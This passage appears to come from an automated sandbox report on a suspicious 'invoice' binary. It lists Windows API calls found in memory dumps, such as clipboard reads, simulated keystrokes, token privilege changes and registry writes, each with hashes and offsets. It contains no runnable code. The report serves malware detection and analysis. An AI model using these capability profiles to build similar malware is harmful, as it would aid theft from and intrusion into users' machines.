                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: 3360d72af0d6583d8a3e3296255e7215abd6b6c5a4dc692a7f139b38c70e403f
                        • Instruction ID: c2aa863ff7a45f2894b09e086c9abe0da0f20572ff71c5ca719355d5a84da8db
                        • Opcode Fuzzy Hash: 3360d72af0d6583d8a3e3296255e7215abd6b6c5a4dc692a7f139b38c70e403f
                        • Instruction Fuzzy Hash: 27F03971905723CFCB34AF64E494992BBE1BF153293248A3EE2D683A10C736A840EF40
                        APIs
                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FA0930
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: LongNamePath_memmove
                        • String ID:
                        • API String ID: 2514874351-0
                        • Opcode ID: 7a086cf437e535c1813dde95391c57876a00c95cf18c008b973ceb84a9fcb5e3
                        • Instruction ID: 8239b05aa2f22b5da7c2928de0a99cb31f2c138bdbff959b273b7c9d9d2e7f43
                        • Opcode Fuzzy Hash: 7a086cf437e535c1813dde95391c57876a00c95cf18c008b973ceb84a9fcb5e3
                        • Instruction Fuzzy Hash: 65E0863690522857C721E6589C05FEA77EDDF88690F0401B5FC4CD7209D969AC819690
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __wfsopen
                        • String ID:
                        • API String ID: 197181222-0
                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction ID: e25c8597bdb12d69ec1f47225631b10aac1ae319af24afbb86da151725326150
                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction Fuzzy Hash: 9AB092B644020C77CE012A82EC02A493B9A9B81BA4F408020FF0C181A2A6B7A660A689
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 0152D8A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                        • Instruction ID: 7e6839f2d5aafb874ea1192cbbdf64aa2458be9c14d352f6313d7cba2cde3ace
                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                        • Instruction Fuzzy Hash: 01E09A7594010DEFDB00DFA8D54969D7BB4EF04301F1005A1FD0596680DA709A548A62
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 0152D8A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction ID: 44320836179a92197e4883e33c10e56a04ecf38a318245b32d291427bd0259d1
                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction Fuzzy Hash: 09E0E67594010DEFDB00DFF8D54969D7BB4FF04301F100161FD05D2280D6709D508A62
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0100CBA1
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0100CBFF
                        • GetWindowLongW.USER32(?,000000F0), ref: 0100CC40
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0100CC6A
                        • SendMessageW.USER32 ref: 0100CC93
                        • _wcsncpy.LIBCMT ref: 0100CCFF
                        • GetKeyState.USER32(00000011), ref: 0100CD20
                        • GetKeyState.USER32(00000009), ref: 0100CD2D
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0100CD43
                        • GetKeyState.USER32(00000010), ref: 0100CD4D
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0100CD76
                        • SendMessageW.USER32 ref: 0100CD9D
                        • SendMessageW.USER32(?,00001030,?,0100B37C), ref: 0100CEA1
                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0100CEB7
                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0100CECA
                        • SetCapture.USER32(?), ref: 0100CED3
                        • ClientToScreen.USER32(?,?), ref: 0100CF38
                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0100CF45
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0100CF5F
                        • ReleaseCapture.USER32 ref: 0100CF6A
                        • GetCursorPos.USER32(?), ref: 0100CFA4
                        • ScreenToClient.USER32(?,?), ref: 0100CFB1
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0100D00D
                        • SendMessageW.USER32 ref: 0100D03B
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0100D078
                        • SendMessageW.USER32 ref: 0100D0A7
                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0100D0C8
                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0100D0D7
                        • GetCursorPos.USER32(?), ref: 0100D0F7
                        • ScreenToClient.USER32(?,?), ref: 0100D104
                        • GetParent.USER32(?), ref: 0100D124
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0100D18D
                        • SendMessageW.USER32 ref: 0100D1BE
                        • ClientToScreen.USER32(?,?), ref: 0100D21C
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0100D24C
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0100D276
                        • SendMessageW.USER32 ref: 0100D299
                        • ClientToScreen.USER32(?,?), ref: 0100D2EB
                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0100D31F
                          • Part of subcall function 00F825DB: GetWindowLongW.USER32(?,000000EB), ref: 00F825EC
                        • GetWindowLongW.USER32(?,000000F0), ref: 0100D3BB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                        • String ID: @GUI_DRAGID$F
                        • API String ID: 3977979337-4164748364
                        • Opcode ID: 374555ac6d117181228c78b9d2b1959c6d5ff817038dc3db0336ec1baa1c41e7
                        • Instruction ID: 052982dbe5a74f0f26c943b94c64c3941877e3f0015734cd55c6dc5a14019d46
                        • Opcode Fuzzy Hash: 374555ac6d117181228c78b9d2b1959c6d5ff817038dc3db0336ec1baa1c41e7
                        • Instruction Fuzzy Hash: 39429C74204701AFF722DF68C984AAABBE5FF49310F140A99F6D5972E1CB36D840DB52
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove$_memset
                        • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                        • API String ID: 1357608183-1798697756
                        • Opcode ID: 51625138eabe6053f3bec6c1be0b81681d6492675a1512dbb46466ab40a2eaa9
                        • Instruction ID: 4b47114f729699ac211d049b1b09651736a93072db0ec3764a5a4f19fb28651f
                        • Opcode Fuzzy Hash: 51625138eabe6053f3bec6c1be0b81681d6492675a1512dbb46466ab40a2eaa9
                        • Instruction Fuzzy Hash: 9B938175E043159BDF24DF58D881BADB7B2FF48720F28816AE945AB380E7749D81EB40
                        APIs
                        • GetForegroundWindow.USER32(00000000,?), ref: 00F84A3D
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FBD9BE
                        • IsIconic.USER32(?), ref: 00FBD9C7
                        • ShowWindow.USER32(?,00000009), ref: 00FBD9D4
                        • SetForegroundWindow.USER32(?), ref: 00FBD9DE
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FBD9F4
                        • GetCurrentThreadId.KERNEL32 ref: 00FBD9FB
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FBDA07
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FBDA18
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FBDA20
                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00FBDA28
                        • SetForegroundWindow.USER32(?), ref: 00FBDA2B
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBDA40
                        • keybd_event.USER32(00000012,00000000), ref: 00FBDA4B
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBDA55
                        • keybd_event.USER32(00000012,00000000), ref: 00FBDA5A
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBDA63
                        • keybd_event.USER32(00000012,00000000), ref: 00FBDA68
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBDA72
                        • keybd_event.USER32(00000012,00000000), ref: 00FBDA77
                        • SetForegroundWindow.USER32(?), ref: 00FBDA7A
                        • AttachThreadInput.USER32(?,?,00000000), ref: 00FBDAA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                        • String ID: Shell_TrayWnd
                        • API String ID: 4125248594-2988720461
                        • Opcode ID: 49383d8119ee142e9848f9232a1e7bd7625e7c6b0cfbe696c808f43f7f3a07e7
                        • Instruction ID: 55da554902ff093ecd4e6db173e99ee0a481c0e299fb493ab2f795f94db83a96
                        • Opcode Fuzzy Hash: 49383d8119ee142e9848f9232a1e7bd7625e7c6b0cfbe696c808f43f7f3a07e7
                        • Instruction Fuzzy Hash: CC316271A403197BEB316FA29C49FBE7E6CEB44B51F104015FA04EA1C1DAB65901BFA1
                        APIs
                          • Part of subcall function 00FD8AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FD8AED
                          • Part of subcall function 00FD8AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FD8B1A
                          • Part of subcall function 00FD8AA3: GetLastError.KERNEL32 ref: 00FD8B27
                        • _memset.LIBCMT ref: 00FD867B
                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FD86CD
                        • CloseHandle.KERNEL32(?), ref: 00FD86DE
                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FD86F5
                        • GetProcessWindowStation.USER32 ref: 00FD870E
                        • SetProcessWindowStation.USER32(00000000), ref: 00FD8718
                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FD8732
                          • Part of subcall function 00FD84F3: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FD8631), ref: 00FD8508
                          • Part of subcall function 00FD84F3: CloseHandle.KERNEL32(?,?,00FD8631), ref: 00FD851A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                        • String ID: $default$winsta0
                        • API String ID: 2063423040-1027155976
                        • Opcode ID: ef0379c04e302ad29b914852339cc89d5a41535e2df0a0b4fb812b5400647002
                        • Instruction ID: d3be6dedae01cf3e78e55312147cf9130ca45686baac95a2668d4d94f057f109
                        • Opcode Fuzzy Hash: ef0379c04e302ad29b914852339cc89d5a41535e2df0a0b4fb812b5400647002
                        • Instruction Fuzzy Hash: 69817CB1D00209AFDF21DFA5CC45AEE7B7AEF04354F08416AF954A6250DB358E06FB60
                        APIs
                        • OpenClipboard.USER32(0100F910), ref: 00FF40A6
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00FF40B4
                        • GetClipboardData.USER32(0000000D), ref: 00FF40BC
                        • CloseClipboard.USER32 ref: 00FF40C8
                        • GlobalLock.KERNEL32(00000000), ref: 00FF40E4
                        • CloseClipboard.USER32 ref: 00FF40EE
                        • GlobalUnlock.KERNEL32(00000000), ref: 00FF4103
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00FF4110
                        • GetClipboardData.USER32(00000001), ref: 00FF4118
                        • GlobalLock.KERNEL32(00000000), ref: 00FF4125
                        • GlobalUnlock.KERNEL32(00000000), ref: 00FF4159
                        • CloseClipboard.USER32 ref: 00FF4269
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                        • String ID:
                        • API String ID: 3222323430-0
                        • Opcode ID: 6919ecd9c0b9017016ed84e82ed90476574c6f96f1ef8970e054e19688df31ad
                        • Instruction ID: d315bdef52c3bf7ed3d53f2fd67a7bbd01b11f28e183a16def781a5250da868a
                        • Opcode Fuzzy Hash: 6919ecd9c0b9017016ed84e82ed90476574c6f96f1ef8970e054e19688df31ad
                        • Instruction Fuzzy Hash: 9A519135204306ABD322FF60DC85F7F77A8AF84B10F140529F686D21A1DF79E905AB62
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 00FEC819
                        • FindClose.KERNEL32(00000000), ref: 00FEC86D
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FEC892
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FEC8A9
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FEC8D0
                        • __swprintf.LIBCMT ref: 00FEC91C
                        • __swprintf.LIBCMT ref: 00FEC95F
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        • __swprintf.LIBCMT ref: 00FEC9B3
                          • Part of subcall function 00FA3818: __woutput_l.LIBCMT ref: 00FA3871
                        • __swprintf.LIBCMT ref: 00FECA01
                          • Part of subcall function 00FA3818: __flsbuf.LIBCMT ref: 00FA3893
                          • Part of subcall function 00FA3818: __flsbuf.LIBCMT ref: 00FA38AB
                        • __swprintf.LIBCMT ref: 00FECA50
                        • __swprintf.LIBCMT ref: 00FECA9F
                        • __swprintf.LIBCMT ref: 00FECAEE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                        • API String ID: 3953360268-2428617273
                        • Opcode ID: ca77cda169eed3b5c22b6ce676ad1bf8e0e5388352750bd8517befbe6bc96e58
                        • Instruction ID: 69ef10b86bb4dd2c23a30dd278c9d27d7288e516f8ed9d68f3c43b851d6323d5
                        • Opcode Fuzzy Hash: ca77cda169eed3b5c22b6ce676ad1bf8e0e5388352750bd8517befbe6bc96e58
                        • Instruction Fuzzy Hash: A9A150B2408304ABC714FB65CC86DEFB7ECEF84700F444919B586C6191EB78DA08D7A2
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00FEF042
                        • _wcscmp.LIBCMT ref: 00FEF057
                        • _wcscmp.LIBCMT ref: 00FEF06E
                        • GetFileAttributesW.KERNEL32(?), ref: 00FEF080
                        • SetFileAttributesW.KERNEL32(?,?), ref: 00FEF09A
                        • FindNextFileW.KERNEL32(00000000,?), ref: 00FEF0B2
                        • FindClose.KERNEL32(00000000), ref: 00FEF0BD
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00FEF0D9
                        • _wcscmp.LIBCMT ref: 00FEF100
                        • _wcscmp.LIBCMT ref: 00FEF117
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEF129
                        • SetCurrentDirectoryW.KERNEL32(01038920), ref: 00FEF147
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FEF151
                        • FindClose.KERNEL32(00000000), ref: 00FEF15E
                        • FindClose.KERNEL32(00000000), ref: 00FEF170
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                        • String ID: *.*
                        • API String ID: 1803514871-438819550
                        • Opcode ID: 38933e9feffebff90831ba6e79fbf1d52de5309b7b96cbd94f3b60adc1925cc5
                        • Instruction ID: 13f55665e0b8d186a14af4e83637f4065c11feb7b3bb07c632fa73b6d918348b
                        • Opcode Fuzzy Hash: 38933e9feffebff90831ba6e79fbf1d52de5309b7b96cbd94f3b60adc1925cc5
                        • Instruction Fuzzy Hash: C531037290024EABDB30EFB1DC49ADE73AC9F49330F0041A6F840D2191EB39DA49EB54
                        APIs
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010009DE
                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0100F910,00000000,?,00000000,?,?), ref: 01000A4C
                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01000A94
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01000B1D
                        • RegCloseKey.ADVAPI32(?), ref: 01000E3D
                        • RegCloseKey.ADVAPI32(00000000), ref: 01000E4A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Close$ConnectCreateRegistryValue
                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                        • API String ID: 536824911-966354055
                        • Opcode ID: 3d693f85ee9ca25b4c9e331383bc04dbc858a1a7277e0ee274bee8e2dd6179f1
                        • Instruction ID: 159f672905ade8b4c88e2def07a4a0e91294ef7ee2e7a3f67d8335f985fd8816
                        • Opcode Fuzzy Hash: 3d693f85ee9ca25b4c9e331383bc04dbc858a1a7277e0ee274bee8e2dd6179f1
                        • Instruction Fuzzy Hash: 660291752046019FDB15EF28C885E6AB7E5FF88714F04845DF88A9B3A2CB78ED41DB81
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00FEF19F
                        • _wcscmp.LIBCMT ref: 00FEF1B4
                        • _wcscmp.LIBCMT ref: 00FEF1CB
                          • Part of subcall function 00FE43C6: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FE43E1
                        • FindNextFileW.KERNEL32(00000000,?), ref: 00FEF1FA
                        • FindClose.KERNEL32(00000000), ref: 00FEF205
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00FEF221
                        • _wcscmp.LIBCMT ref: 00FEF248
                        • _wcscmp.LIBCMT ref: 00FEF25F
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEF271
                        • SetCurrentDirectoryW.KERNEL32(01038920), ref: 00FEF28F
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FEF299
                        • FindClose.KERNEL32(00000000), ref: 00FEF2A6
                        • FindClose.KERNEL32(00000000), ref: 00FEF2B8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                        • String ID: *.*
                        • API String ID: 1824444939-438819550
                        • Opcode ID: db11b89e3438c233eb1f405a4b07a1cb65daebb6f60c1242f556ba8ac5d9e742
                        • Instruction ID: 77256b1b81f196b4286e85a81c0b9fc9c13049ca8fb2b6066cc22b6e8f2801fe
                        • Opcode Fuzzy Hash: db11b89e3438c233eb1f405a4b07a1cb65daebb6f60c1242f556ba8ac5d9e742
                        • Instruction Fuzzy Hash: A631033690069A7BCB20AFA2DC48EDE73AC9F45330F1441A6F940A21A0DB35DE49EB54
                        APIs
                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FEA299
                        • __swprintf.LIBCMT ref: 00FEA2BB
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FEA2F8
                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FEA31D
                        • _memset.LIBCMT ref: 00FEA33C
                        • _wcsncpy.LIBCMT ref: 00FEA378
                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FEA3AD
                        • CloseHandle.KERNEL32(00000000), ref: 00FEA3B8
                        • RemoveDirectoryW.KERNEL32(?), ref: 00FEA3C1
                        • CloseHandle.KERNEL32(00000000), ref: 00FEA3CB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                        • String ID: :$\$\??\%s
                        APIs
                          • Part of subcall function 00FD852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FD8546
                          • Part of subcall function 00FD852A: GetLastError.KERNEL32(?,00FD800A,?,?,?), ref: 00FD8550
